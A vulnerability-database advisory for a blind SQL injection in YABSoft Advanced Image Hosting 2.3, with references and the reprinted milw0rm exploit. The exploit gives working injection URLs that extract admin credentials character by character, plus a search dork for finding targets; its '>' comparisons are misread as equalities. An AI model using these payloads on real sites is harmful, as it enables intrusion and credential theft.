YABSoft Advanced Image Hosting Script 'gallery_list.php' SQL Injection Vulnerability

Vulnerability ID: 1117485    Type: SQL injection
Published: 2009-03-18    Updated: 2009-04-01
CVE: CVE-2009-1032    CNNVD ID: CNNVD-200903-351
Platform: PHP    CVSS score: 7.5
|Sources
https://www.exploit-db.com/exploits/8238
https://cxsecurity.com/issue/WLB-2009030200
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-351
|Details
A SQL injection vulnerability exists in gallery_list.php in YABSoft Advanced Image Hosting (AIH) Script 2.3. The gal parameter is concatenated into a SQL query inside a quoted string (the published PoC closes the quote with gal=3'), so a remote attacker can execute arbitrary SQL commands via that parameter. The published exploit is boolean-based blind injection: the application returns a different page depending on whether an injected condition is true, which is enough to read the admin username and password hash from the setting table one character at a time.
|Exploit
###################################################################
Advanced Image Hosting (AIH) Remote Blind SQL Injection 
###################################################################


###################################################
#[~] Author        :  boom3rang 
#[~] Greetz        :  H!tm@N, KHG, chs, redc00de
#[~] Vulnerability :  Blind SQL injection 
#[~] Google Dork   :  Powered by: AIH v2.3
--------------------------------------------------
#[!] Product Name  :  Advanced Image Hosting    
#[!] Product Site  :  http://www.yabsoft.info
#[!] Version       :  v2.3
#[!] Download      :  http://yabsoft.com/aihs-feature.php
###################################################

[!] AIH Blind SQL Injection.

PoC / Live Demo:
-------------
http://yabsoft.info/demo/aihspro/gallery_list.php?gal=3'/**/and/**/ascii(substring((select/**/concat(admin,0x3a,pass)/**/from/**/setting/**/limit/**/0,1),1,1))>100--++

First character of the username is char(100) -->  char="d"
-------------
http://yabsoft.info/demo/aihspro/gallery_list.php?gal=3'/**/and/**/ascii(substring((select/**/concat(admin,0x3a,pass)/**/from/**/setting/**/limit/**/0,1),2,1))>101--++

Second character of the username is char(101) -->  char2="e"
-------------
http://yabsoft.info/demo/aihspro/gallery_list.php?gal=3'/**/and/**/ascii(substring((select/**/concat(admin,0x3a,pass)/**/from/**/setting/**/limit/**/0,1),3,1))>109--++

Next character of the username is char(109) --> char3="m"
-------------
http://yabsoft.info/demo/aihspro/gallery_list.php?gal=3'/**/and/**/ascii(substring((select/**/concat(admin,0x3a,pass)/**/from/**/setting/**/limit/**/0,1),4,1))>111--++

And the last character of the username is char(111) --> char4="o"
-------------
As we see, the username is "demo"; now you can continue finding the other characters of the password, changing the character number 5,6,7,8,9,10........


##############################
#[!] Proud 2 be Albanian
#[!] Proud 2 be Muslim
#[!] United States of Albania
##############################

# milw0rm.com [2009-03-18]
|References

Source: XF
Name: advancedimage-gallerylist-sql-injection(49316)
Link: http://xforce.iss.net/xforce/xfdb/49316
Source: BID
Name: 34176
Link: http://www.securityfocus.com/bid/34176
Source: MILW0RM
Name: 8238
Link: http://www.milw0rm.com/exploits/8238
Source: SECUNIA
Name: 34366
Link: http://secunia.com/advisories/34366
Source: OSVDB
Name: 52813
Link: http://osvdb.org/52813